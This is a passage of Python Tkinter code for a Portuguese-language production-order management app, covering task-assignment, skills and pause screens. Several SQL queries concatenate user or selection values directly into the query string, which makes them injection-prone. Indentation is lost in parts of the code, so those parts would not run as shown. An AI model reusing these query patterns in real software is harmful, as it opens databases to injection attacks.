lbDados31.place(relx=0.695, rely=0.690, relwidth=0.02)
lbDados32.place(relx=0.945, rely=0.690, relwidth=0.02)
lbDados33.place(relx=0.205, rely=0.770, relwidth=0.02)
lbDados34.place(relx=0.445, rely=0.770, relwidth=0.02)
lbDados35.place(relx=0.695, rely=0.770, relwidth=0.02)
lbDados36.place(relx=0.945, rely=0.770, relwidth=0.02)
lbDados37.place(relx=0.205, rely=0.850, relwidth=0.02)
lbDados38.place(relx=0.445, rely=0.850, relwidth=0.02)
lbDados39.place(relx=0.695, rely=0.850, relwidth=0.02)
lbDados40.place(relx=0.945, rely=0.850, relwidth=0.02)
lbDados41.place(relx=0.205, rely=0.930, relwidth=0.02)
#Exibindo habilidades do funcionário
try:
self.cursor.execute("select Nivel from competencia where idOperador = '"+idd+"' ")
listaNivel = self.cursor.fetchall()
lista = []
for nivel in range(len(listaNivel)):
lista.append(listaNivel[nivel][0])
lbDados1['text'], lbDados2['text'], lbDados3['text'], lbDados4['text'], lbDados5['text'], lbDados6['text'], lbDados7['text'], lbDados8['text'], lbDados9['text'], lbDados10['text'], lbDados11['text'], lbDados12['text'], lbDados13['text'], lbDados14['text'], lbDados15['text'], lbDados16['text'], lbDados17['text'], lbDados18['text'], lbDados19['text'], lbDados20['text'], lbDados21['text'], lbDados22['text'], lbDados23['text'], lbDados24['text'], lbDados25['text'], lbDados26['text'], lbDados27['text'], lbDados28['text'], lbDados29['text'], lbDados30['text'], lbDados31['text'], lbDados32['text'], lbDados33['text'], lbDados34['text'], lbDados35['text'], lbDados36['text'], lbDados37['text'], lbDados38['text'], lbDados39['text'], lbDados40['text'], lbDados41['text'] = lista
except Exception as erro:
print(f'errou 1 {erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
self.janelaHabilidade.mainloop()
    def atribuir_tarefa(self):
        """Open the multi-page "Atribuição de tarefa" (task assignment) dialog.

        The window behaves as a small wizard: page 1 collects piece number,
        quantity, operation and time-per-piece; page 2 selects machines;
        page 3 selects operators; page 4 shows a summary.  Navigation is
        wired to ``chamar_proxima_folha`` / ``voltar_folha_anterior`` and the
        final button to ``inserir_atribuicao`` (all defined elsewhere in this
        class).  The dialog is modal over ``self.aba4``.
        """
        self.janelaAtribuir = Toplevel()
        self.janelaAtribuir.title('Atribuição de tarefa')
        self.janelaAtribuir['bg'] = 'white'
        self.centraliza_tela(400, 400, self.janelaAtribuir)
        # Index of the wizard page currently shown.
        self.prox = 0
        # Buttons to go back, go forward and finish the wizard.
        self.botAnterior = Button(self.janelaAtribuir, text='Anterior', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.voltar_folha_anterior)
        self.botProximo = Button(self.janelaAtribuir, text='Próximo', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.chamar_proxima_folha, state=DISABLED)
        self.botProximo.place(relx=0.770, rely=0.900)
        self.botConcluir = Button(self.janelaAtribuir, text='Concluir', font=('arial', 10, 'bold'), fg='#344f84', border=1, relief=SOLID, command=self.inserir_atribuicao)
        # Frame 1 of page 1: piece, quantity, time and operation settings.
        def verificarPeca(*args):
            # Keep the piece field numeric and at most 13 digits long,
            # then re-validate page 1.
            h = self.campoPeca.get()
            if len(h) >= 1:
                if not h.isnumeric():
                    self.campoPeca.delete(0, END)
                if h.isnumeric():
                    if len(h) > 13:
                        varPeca.set(h[:13])
            self.verificar_frame1('')
        def verificarQuant(*args):
            # Keep the quantity numeric and capped at 1000.
            h = varQuant.get()
            if len(h) >= 1:
                if not h.isnumeric():
                    self.campoQuant.delete(0, END)
                if h.isnumeric():
                    if int(h) > 1000:
                        varQuant.set(varQuant.get()[:-1])
            self.verificar_frame1('')
        def verificarSelect(*args):
            # Re-validate page 1 whenever the operation selection changes.
            self.verificar_frame1('')
        varPeca = StringVar()
        varPeca.trace('w', verificarPeca)
        varQuant = StringVar()
        varQuant.trace('w', verificarQuant)
        varSelect = StringVar()
        varSelect.trace('w', verificarSelect)
        self.frameAt1 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
        self.frameAt1.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.280)
        lbl = Label(self.janelaAtribuir, text='ATRIBUIR PROCESSO', font=('arial', 15, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.500, rely=0.070, anchor='center')
        lbl = Label(self.frameAt1, text='Peça', font=('arial', 13, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.035, rely=0.600)
        self.campoPeca = Entry(self.frameAt1, font=('arial', 12), relief=GROOVE, border=2, textvariable=varPeca)
        self.campoPeca.place(relx=0.210, rely=0.600, relwidth=0.300)
        lbl = Label(self.frameAt1, text='Quant.', font=('arial', 13, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.570, rely=0.600)
        self.campoQuant = Spinbox(self.frameAt1, from_=0, to=1000, font=('arial', 12), relief=GROOVE, border=2, textvariable=varQuant)
        self.campoQuant.place(relx=0.780, rely=0.600, relwidth=0.200)
        self.frameAt2 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
        self.frameAt2.place(relx=0.100, rely=0.530, relwidth=0.800, relheight=0.250)
        lbl = Label(self.frameAt2, text='Operação', font=('arial', 11, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.010, rely=0.100)
        # Fetch the available operations from the database and offer them as
        # combobox options (plus the fixed 'Parado'/idle entry).
        self.cursor.execute('select Codigo_Operacao, Processo_Usinagem from operacao')
        show = self.cursor.fetchall()
        ls = ['Parado']
        for oper in show:
            ls.append((f'{oper[0]} {oper[1]}'))
        self.operacaoSelect = ttk.Combobox(self.frameAt2, font=('arial',11), state="readonly", textvariable=varSelect)
        self.operacaoSelect['values'] = ls
        self.operacaoSelect.current(0)
        self.operacaoSelect.place(relx=0.290, rely=0.100, relwidth=0.500)
        lbl = Label(self.frameAt2, text='Temp/P Oper.', font=('arial', 11, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.010, rely=0.490)
        def verificarH(*args):
            # Hours field: digits only, value kept below 60.
            h = self.campoHora.get()
            if len(h) >= 1:
                if not h.isnumeric():
                    self.campoHora.delete(0, END)
                if h.isnumeric():
                    if int(h) >= 60:
                        varH.set(self.campoHora.get()[:-1])
            self.verificar_frame1('')
        def verificarM(*args):
            # Minutes field: digits only, value kept below 60.
            m = self.campoMinuto.get()
            if len(m) >= 1:
                if not m.isnumeric():
                    self.campoMinuto.delete(0, END)
                if m.isnumeric():
                    if int(m) >= 60:
                        varM.set(self.campoMinuto.get()[:-1])
            self.verificar_frame1('')
        def verificarS(*args):
            # Seconds field: digits only, value kept below 60.
            s = self.campoSegundo.get()
            if len(s) >= 1:
                if not s.isnumeric():
                    self.campoSegundo.delete(0, END)
                if s.isnumeric():
                    if int(s) >= 60:
                        varS.set(self.campoSegundo.get()[:-1])
            self.verificar_frame1('')
        varH = StringVar()
        varH.trace('w', verificarH)
        varM = StringVar()
        varM.trace('w', verificarM)
        varS = StringVar()
        varS.trace('w', verificarS)
        # Composite HH:MM:SS entry for the per-piece operation time.
        fHoraPorOperacao = Frame(self.frameAt2, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, width=95, height=23, bg='white')
        fHoraPorOperacao.place(relx=0.380, rely=0.480)
        self.campoHora = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varH)
        self.campoHora.place(x=0, y=1)
        self.campoHora.insert(0, "00")
        lbl = Label(fHoraPorOperacao, text=':', font=('arial', 10, 'bold'), bg='white', border=0)
        lbl.place(x=22, y=0)
        self.campoMinuto = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varM)
        self.campoMinuto.place(x=34, y=1)
        lbl = Label(fHoraPorOperacao, text=':', font=('arial', 10, 'bold'), bg='white', border=0)
        lbl.place(x=57, y=0)
        self.campoMinuto.insert(0, "00")
        self.campoSegundo = Entry(fHoraPorOperacao, font=('arial', 10), width=2, relief=GROOVE, border=0, textvariable=varS)
        self.campoSegundo.place(x=70, y=1)
        self.campoSegundo.insert(0, "00")
        self.acessOperacao = IntVar()
        self.acessoSimultaneoOperacao = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessOperacao, bg='white', activebackground='white')
        self.acessoSimultaneoOperacao.place(relx=0.540, rely=0.780)
        # =========================================== PART 2 ======================================
        # Machine-selection page.
        self.frameAt3 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
        lbl = Label(self.frameAt3, text='Selecione a Máquina:', font=('arial', 12, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.020, rely=0.050)
        try:
            self.cursor.execute('select Codigo, Maquina from maquinas')
            tuplaMaquina = self.cursor.fetchall()
        except:
            # NOTE(review): bare except; also, after destroy() the code below
            # still references tuplaMaquina, so a DB failure here would raise
            # NameError — confirm intended behavior before tightening.
            if messagebox.showwarning(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível consultar o Banco de Dados'):
                self.janelaAtribuir.destroy()
        sf = ScrolledFrame(self.frameAt3, width=280, height=140)
        sf.place(relx=0.030, rely=0.200, relwidth=0.950, relheight=0.799)
        frame = sf.display_widget(Frame)
        def irr():
            pass
            #print(self.listaMaquina[0][1].get())
        # listaMaquina ends up holding [code, Variable] pairs: the Variable
        # carries the checkbox state for that machine.
        self.listaMaquina = list()
        for valor in tuplaMaquina:
            self.listaMaquina.append([valor[0], valor[1]])
        for i in self.listaMaquina:
            vCod = i[0]
            vMaq = i[1]
            # Replace the machine name with the checkbox Variable; the name
            # survives only in the checkbox caption.
            i[1] = Variable()
            i[1].set(0)
            self.maquinaCheck = Checkbutton(frame, text=vCod+" "+vMaq, font=('arial', 9), justify=LEFT, variable=i[1], command = lambda: self.verificar_frame1(''), indicatoron=True, bg='white', width=37, anchor='w')
            self.maquinaCheck.pack(side=TOP, anchor='w')
        self.acessMaquina = IntVar()
        self.controleCheck = 0  # counts how many machines have been selected
        self.controleOne = ''  # stores the first machine that was selected
        self.acessoSimultaneoMaquina = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessMaquina, bg='white', activebackground='white')
        # =========================================== PART 3 ======================================
        # Operator-selection page.
        self.frameAt4 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
        lbl = Label(self.frameAt4, text='Selecione o Operador:', font=('arial', 12, 'bold'), fg='#344f84', bg='white')
        lbl.place(relx=0.020, rely=0.050)
        try:
            self.cursor.execute("select Nome, CPF from funcionarios where Membro = 'ativo'")
            tuplaFuncionario = self.cursor.fetchall()
        except:
            # NOTE(review): same bare-except / NameError concern as above.
            if messagebox.showwarning(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível consultar o Banco de Dados'):
                self.janelaAtribuir.destroy()
        sf2 = ScrolledFrame(self.frameAt4, width=280, height=140)
        sf2.place(relx=0.030, rely=0.200, relwidth=0.950, relheight=0.799)
        frame = sf2.display_widget(Frame)
        def ir():
            pass
            #print(self.listaFuncionario[0][0].get())
        # listaFuncionario ends up holding [Variable, CPF] pairs after the
        # loop below replaces the name with the checkbox Variable.
        self.listaFuncionario = list()
        for valor in tuplaFuncionario:
            self.listaFuncionario.append([valor[0], valor[1]])
        for i in self.listaFuncionario:
            vNome = i[0]
            vCPF = str(i[1])
            i[0] = Variable()
            i[0].set(0)
            Operador3 = Checkbutton(frame, text=vNome+" "+vCPF, font=('arial', 9), justify=LEFT, variable=i[0], command=lambda:self.verificar_frame1(''), indicatoron=True, bg='white', width=37, anchor='w')
            Operador3.pack(side=TOP, anchor='w')
        self.acessOperador = IntVar()
        self.controleCheck2 = 0  # counts how many operators have been selected
        self.controleOne2 = ''  # stores the first operator that was selected
        self.acessoSimultaneoOperador = Checkbutton(self.janelaAtribuir, text='Acesso Simultâneo', font=('arial', 9), justify=LEFT, variable=self.acessOperador, bg='white', activebackground='white')
        # =========================================== PART 4 ======================================
        # Summary page: a scrollable canvas listing everything chosen so far.
        def onFrameConfigure(canvas):
            # Grow the scrollregion to match the canvas content.
            canvas.configure(scrollregion=canvas.bbox('all'))
        self.frameAt5 = Frame(self.janelaAtribuir, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
        canvas = Canvas(self.frameAt5, borderwidth=0, background='white')
        frame4 = Frame(canvas, background='white')
        scroll = Scrollbar(self.frameAt5, orient='vertical', command=canvas.yview)
        canvas.configure(yscrollcommand=scroll.set)
        scroll.pack(side='right', fill='y')
        canvas.pack(side='left', fill='both', expand=True)
        canvas.create_window((8,8), window=frame4, anchor='nw')
        frame4.bind('<Configure>', lambda event, canvas=canvas: onFrameConfigure(canvas))
        # Summary labels; the 'tr' placeholders are presumably overwritten by
        # the page-navigation code elsewhere in the class — confirm.
        self.lbl1 = Label(frame4, text='O.S:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl1.grid(row=1, column=0, pady=(20,2), padx=(0,0))
        self.dados1 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=18, anchor=W)
        self.dados1.grid(row=1, column=0, pady=(20,2), padx=(1,0))
        #self.lbl1.pack(side='top', anchor='w')
        self.lbl2 = Label(frame4, text='Peça:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl2.grid(row=2, column=0, sticky=N, pady=3)
        ##self.lbl2.pack(side='top', anchor='w')
        self.dados2 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=18, anchor=W)
        self.dados2.grid(row=2, column=0, pady=3, padx=(10,0))
        self.lbl3 = Label(frame4, text='Operação:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl3.grid(row=3, column=0, sticky=N, pady=3)
        ##self.lbl3.pack(side='top', anchor='w')
        self.dados3 = Label(frame4, text='tr', font=('arial', 10, 'bold'), fg='green', bg='white', width=24, anchor=W)
        self.dados3.grid(row=3, column=0, pady=3, padx=(84,0))
        self.lbl4 = Label(frame4, text='Quantidade:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl4.grid(row=4, column=0, sticky=N, pady=2)
        ##self.lbl4.pack(side='top', anchor='w')
        self.dados4 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=15, anchor=W)
        self.dados4.grid(row=4, column=0, pady=2, padx=(80,0))
        self.lbl5 = Label(frame4, text='Tempo da Peça:', font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl5.grid(row=5, column=0, sticky=N, pady=2)
        ##self.lbl5.pack(side='top', anchor='w')
        self.dados5 = Label(frame4, text='tr', font=('arial', 11, 'bold'), fg='green', bg='white', width=15, anchor=W)
        self.dados5.grid(row=5, column=0, pady=2, padx=(140,0))
        self.lbl6 = Label(frame4, text="Máquina Selecionada:", font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl6.grid(row=6, column=0, sticky=N, pady=2)
        ##self.lbl6.pack(side='top', anchor='w')
        self.text1 = Text(frame4, font=('arial', 10), border=1, relief=SOLID, bg='white', state=DISABLED, width=37, height=5)
        self.text1.grid(row=7, column=0, pady=2)
        ##self.lbl6.place(relx=0.020, rely=0.650, relwidth=0.950, relheight=0.200)
        self.lbl7 = Label(frame4, text="Operador Selecionado:", font=('arial', 11, 'bold'), fg='#344f84', bg='white', width=30, anchor=W)
        self.lbl7.grid(row=8, column=0, sticky=N, pady=2)
        #self.lbl7.pack(side='top', anchor='w')
        self.text2 = Text(frame4, font=('arial', 10), border=1, relief=SOLID, bg='white', state=DISABLED, width=37, height=5)
        self.text2.grid(row=9, column=0, pady=2)
        # Keep the dialog modal over tab 4 until it is closed.
        self.janelaAtribuir.transient(self.aba4)
        self.janelaAtribuir.focus_force()
        self.janelaAtribuir.grab_set()
        self.janelaAtribuir.mainloop()
    # Window with the detail views opened by each toolbar button
def exibir_toplevel_inicio(self, event):
self.janelaDetalhesOS = Toplevel()
self.janelaDetalhesOS.title('Informações de processo')
self.janelaDetalhesOS['bg'] = 'white'
self.centraliza_tela(1000, 600, self.janelaDetalhesOS)
#Pegando o Número de O.S que foi selecionada ao abrir janela
selecionada = self.OrdemServico.selection()[0]
self.pegarOS = self.OrdemServico.item(selecionada, "values")
self.pegarOS = self.pegarOS[1]
label= Label(self.janelaDetalhesOS, text='Nº', font=('arial', 10, 'bold'), fg='#344f84', bg='white')
label.place(relx=0.870, rely=0.030)
label= Label(self.janelaDetalhesOS, text=self.pegarOS, font=('arial', 15, 'bold'), fg='red', bg='white')
label.place(relx=0.900, rely=0.020)
#Frame onde ficará contagens de OS
self.frameExibirTotalOperacao = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
linhaCabecario = Label(self.frameExibirTotalOperacao, bg='#344f84')
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.220)
labelTitle1 = Label(self.frameExibirTotalOperacao, text='Total Operações', bg='#344f84', fg='white', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0, rely=0, relheight=0.210)
lbOSConcluidas = Label(self.frameExibirTotalOperacao, text='Concluídas:', bg='white', fg='black', font=('arial', 10,'bold'))
lbOSConcluidas.place(relx=0.020, rely=0.350)
lbOSConcluidasDados = Label(self.frameExibirTotalOperacao, bg='white', fg='green', font=('arial', 15, 'bold'))
lbOSConcluidasDados.place(relx=0.670, rely=0.340)
lbOSRetrabalho = Label(self.frameExibirTotalOperacao, text='Retrabalhos:', bg='white', fg='black', font=('arial', 10,'bold'))
lbOSRetrabalho.place(relx=0.020, rely=0.650)
lbOSRetrabalhoDados = Label(self.frameExibirTotalOperacao, bg='white', fg='red', font=('arial', 15, 'bold'))
lbOSRetrabalhoDados.place(relx=0.670, rely=0.640)
self.homeImg = PhotoImage(file="image/home.png")
botHome = Button(self.janelaDetalhesOS, text='Início', image=self.homeImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_inicio)
botHome.place(relx=0.250, rely=0.070)
self.trocarFuncioanrioImg = PhotoImage(file="image/trocar.png")
botTrocar = Button(self.janelaDetalhesOS, text='Trocar', image=self.trocarFuncioanrioImg, bg='white', activebackground='white', compound=TOP, border=0)
botTrocar.place(relx=0.400, rely=0.070)
self.pausadasImg = PhotoImage(file="image/user.png")
botPausadas = Button(self.janelaDetalhesOS, text='Pausas', image=self.pausadasImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_pausas)
botPausadas.place(relx=0.500, rely=0.070)
self.pecaImg = PhotoImage(file="image/peca.png")
botPeca = Button(self.janelaDetalhesOS, text='Peças util.', image=self.pecaImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_pecas)
botPeca.place(relx=0.600, rely=0.070)
self.infoImg = PhotoImage(file="image/info.png")
botInfo = Button(self.janelaDetalhesOS, text='Sobre', image=self.infoImg, bg='white', activebackground='white', compound=TOP, border=0, command=self.botao_exibir_sobre)
botInfo.place(relx=0.700, rely=0.070)
#Frame onde ficará as informações referente ao tempo
self.frameDadosTempo = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=2, bg='white')
linhaCabecario = Label(self.frameDadosTempo, bg='#344f84')
linhaCabecario.place(relx=0, rely=0, relwidth=1, relheight=0.065)
labelTitle1 = Label(self.frameDadosTempo, text='Tempo/Horas', bg='#344f84', fg='white', font=('arial', 13, 'bold'))
labelTitle1.place(relx=0, rely=0, relheight=0.065)
self.lblSemInformacao = Label(self.frameDadosTempo, text='Sem Informações', font=('arial', 8), bg='white')
self.lblSemInformacao.place(relx=0.5, rely=0.5, anchor="center")
self.checkVisto = PhotoImage(file='image/check.png')
self.lb1 = Label(self.frameDadosTempo, text='Tempo Definido:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img1 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoProgramado = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb2 = Label(self.frameDadosTempo, text='Tempo Operando:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img2 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoOperando = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb3 = Label(self.frameDadosTempo, text='Tempo Gasto:', font=('arial', 10, 'bold'), bg='white', fg='green')
self.img3 = Label(self.frameDadosTempo, image=self.checkVisto, bg='white')
self.dadosTempoGasto = Label(self.frameDadosTempo, font=('arial', 8), bg='white')
self.lb4 = Label(self.frameDadosTempo, text='Tempo Extra:', font=('arial', 10, 'bold'), bg='white', fg='red')
self.check2 = PhotoImage(file='image/check2.png')
self.img4 = Label(self.frameDadosTempo, image=self.check2, bg='white')
self.dadosTempoExtra = Label(self.frameDadosTempo, font=('arial', 8), bg='white', fg='red')
#Frame onde ficará os resultado das buscas feitas ao Banco de Dados
self.frameDadosTreeview = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
#Posiçãao estática para classificação das colunas
self.sinal = 0
#Label e Combobox para escolher o Tipo de OS a ser pesquisada
self.labelTipo = Label(self.janelaDetalhesOS, text='Tipo', font=('arial', 10, 'bold'), bg='white')
self.boxTipo = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxTipo['values'] = ('Tudo', 'Nova OS', 'Retrabalho OS')
self.boxTipo.current(0)
#Label e Combobox para escolher qual tipo de pesquisa será feita
self.labelPesquisar = Label(self.janelaDetalhesOS, text='Pesquisar por', font=('arial', 10, 'bold'), bg='white')
self.boxPesquisar = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
self.boxPesquisar['values'] = ('Nome', 'CPF', 'Nº Peça', 'Nº Operação')
self.boxPesquisar.current(0)
#Barra de busca e botão para pesquisar
self.strCampoBusca = StringVar()
self.strCampoBusca.trace('w', self.buscar)
self.campoBusca = Entry(self.janelaDetalhesOS, font=('arial', 12), border=2, relief=GROOVE)
self.campoBusca.bind("<Return>", self.buscar)
self.campoBusca.focus_force()
self.imgBuscar = PhotoImage(file="image/lupa.png")
self.botBuscar = Button(self.janelaDetalhesOS, image=self.imgBuscar, border=0, command=lambda:self.buscar(0))
#Tree view onde exibirá as Ordem de Serviços
self.viewOrdemServico = ttk.Treeview(self.frameDadosTreeview, column=('1','2','3','4','5','6','7'), show='headings')
self.viewOrdemServico.heading('1', text='ID', command=lambda:self.classificar_coluna('ID', self.sinal))
self.viewOrdemServico.heading('2', text='Operador', command=lambda:self.classificar_coluna('Operador', self.sinal))
self.viewOrdemServico.heading('3', text='Peça', command=lambda:self.classificar_coluna('CodigoPeca', self.sinal))
self.viewOrdemServico.heading('4', text='Operação', command=lambda:self.classificar_coluna('CodigoOperacao', self.sinal))
self.viewOrdemServico.heading('5', text='QTDE', command=lambda:self.classificar_coluna('Quant', self.sinal))
self.viewOrdemServico.heading('6', text='Máquina', command=lambda:self.classificar_coluna('Maquina', self.sinal))
self.viewOrdemServico.heading('7', text='Tipo', command=lambda:self.classificar_coluna('Estado', self.sinal))
self.viewOrdemServico.column("1", width=-90, anchor='n')
self.viewOrdemServico.column("2", width=120, anchor='n')
self.viewOrdemServico.column("3", width=1, anchor='n')
self.viewOrdemServico.column("4", width=20, anchor='n')
self.viewOrdemServico.column("5", width=-50, anchor='n')
self.viewOrdemServico.column("6", width=30, anchor='n')
self.viewOrdemServico.column("7", width=20, anchor='n')
self.viewOrdemServico.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
self.viewOrdemServico.bind("<Return>", self.exibir_info_da_operacao)
self.viewOrdemServico.bind("<ButtonRelease-1>", self.exibir_info_tempo_horas)
self.viewOrdemServico.bind("<Double-1>", self.exibir_info_da_operacao)
self.viewOrdemServico.bind("<Escape>", lambda event: self.remover_focus(event, self.viewOrdemServico))
scrollbar = Scrollbar(self.frameDadosTreeview, orient="vertical", command=self.viewOrdemServico.yview)
self.viewOrdemServico.configure(yscrollcommand=scrollbar.set)
scrollbar.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
scrollbar2 = Scrollbar(self.frameDadosTreeview, orient="horizontal", command=self.viewOrdemServico.xview)
self.viewOrdemServico.configure(xscrollcommand=scrollbar2.set)
scrollbar2.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
self.labelerro = Label(self.frameDadosTreeview, bg='white')
try:
self.cursor.execute("select * from concluidas where Tipo = 'Nova OS' and OS = "+self.pegarOS)
valido = self.cursor.fetchall()
lbOSConcluidasDados['text'] = len(valido)
self.cursor.execute("select * from concluidas where Tipo = 'Retrabalhar OS' and OS = "+self.pegarOS)
valido = self.cursor.fetchall()
lbOSRetrabalhoDados['text'] = len(valido)
self.cursor.execute("select a.id, b.Nome, a.Peca, c.Processo_Usinagem, a.Quant, d.Maquina, a.Estado from ordem_processo as a join funcionarios as b on b.id = a.idOperador join operacao as c on c.id = a.idOperacao join maquinas as d on d.id = a.idMaquina where OS ="+self.pegarOS)
valido = self.cursor.fetchall()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[i][0]
Operador = valido[i][1]
CodigoPeca = valido[i][2]
CodigoOperacao = valido[i][3]
Quant = valido[i][4]
Maquina = valido[i][5]
Estado = valido[i][6]
self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Maquina, Estado))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
#Chamando widgets com referência aos dados dessa OS
self.botao_exibir_inicio()
self.exibir_toplevel_pausas()
self.exibir_toplevel_pecas()
self.exibir_toplevel_sobre()
self.janelaDetalhesOS.transient(self.aba4)
self.janelaDetalhesOS.focus_force()
self.janelaDetalhesOS.grab_set()
self.janelaDetalhesOS.mainloop()
def exibir_toplevel_pausas(self):
    """Build the 'paused operations' page of janelaDetalhesOS.

    Creates the search widgets (type / search-by comboboxes, a live-search
    entry and a search button) plus a Treeview listing every pause recorded
    for the current O.S. (self.pegarOS), then fills the Treeview from the
    `pausas` table.  Widgets are only created here; placement of the page
    happens elsewhere (only the Treeview and scrollbars are placed now).
    """
    # Label and combobox to choose which O.S. type to search for
    self.labelTipo2 = Label(self.janelaDetalhesOS, text='Tipo', font=('arial', 10, 'bold'), bg='white')
    self.boxTipo2 = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
    self.boxTipo2['values'] = ('Tudo', 'Nova OS', 'Retrabalho OS')
    self.boxTipo2.current(0)
    # Label and combobox to choose which field the search applies to
    self.labelPesquisar2 = Label(self.janelaDetalhesOS, text='Pesquisar por', font=('arial', 10, 'bold'), bg='white')
    self.boxPesquisar2 = ttk.Combobox(self.janelaDetalhesOS, font=('arial',10), state='readonly')
    self.boxPesquisar2['values'] = ('Nome', 'CPF')
    self.boxPesquisar2.current(0)
    # Search bar (the trace makes it filter on every keystroke) and search button
    self.strCampoBusca2 = StringVar()
    self.strCampoBusca2.trace('w', self.buscar2)
    self.campoBusca2 = Entry(self.janelaDetalhesOS, font=('arial', 12), border=2, relief=GROOVE)
    self.campoBusca2.bind("<Return>", self.buscar2)
    self.campoBusca2.focus_force()
    self.botBuscar2 = Button(self.janelaDetalhesOS, image=self.imgBuscar, border=0, command=lambda:self.buscar2(0))
    self.frameDadosTreeviewPause = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
    # Treeview listing the paused operations of this O.S.
    self.viewPausas = ttk.Treeview(self.frameDadosTreeviewPause, column=('1','2','3','4','5','6','7','8'), show='headings')
    self.viewPausas.heading('1', text='ID')
    self.viewPausas.heading('2', text='Operador')
    self.viewPausas.heading('3', text='Motivo da Pausa')
    self.viewPausas.heading('4', text='Peça')
    self.viewPausas.heading('5', text='Tipo')
    self.viewPausas.heading('6', text='Duração')
    self.viewPausas.heading('7', text='Produzido')
    self.viewPausas.heading('8', text='Máquina')
    self.viewPausas.column("1", width=-50, anchor='n', minwidth=20)
    self.viewPausas.column("2", width=120, anchor='n', minwidth=200)
    self.viewPausas.column("3", width=30, anchor='n', minwidth=100)
    self.viewPausas.column("4", width=20, anchor='n', minwidth=80)
    self.viewPausas.column("5", width=30, anchor='n', minwidth=100)
    self.viewPausas.column("6", width=20, anchor='n', minwidth=80)
    self.viewPausas.column("7", width=20, anchor='n', minwidth=80)
    self.viewPausas.column("8", width=30, anchor='n', minwidth=80)
    self.viewPausas.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
    self.viewPausas.bind("<Return>", self.exibir_info__pausa)
    self.viewPausas.bind("<Double-1>", self.exibir_info__pausa)
    self.viewPausas.bind("<Escape>", lambda event: self.remover_focus(event, self.viewPausas))
    scrollbar3 = Scrollbar(self.frameDadosTreeviewPause, orient="vertical", command=self.viewPausas.yview)
    self.viewPausas.configure(yscrollcommand=scrollbar3.set)
    scrollbar3.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
    scrollbar4 = Scrollbar(self.frameDadosTreeviewPause, orient="horizontal", command=self.viewPausas.xview)
    self.viewPausas.configure(xscrollcommand=scrollbar4.set)
    scrollbar4.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
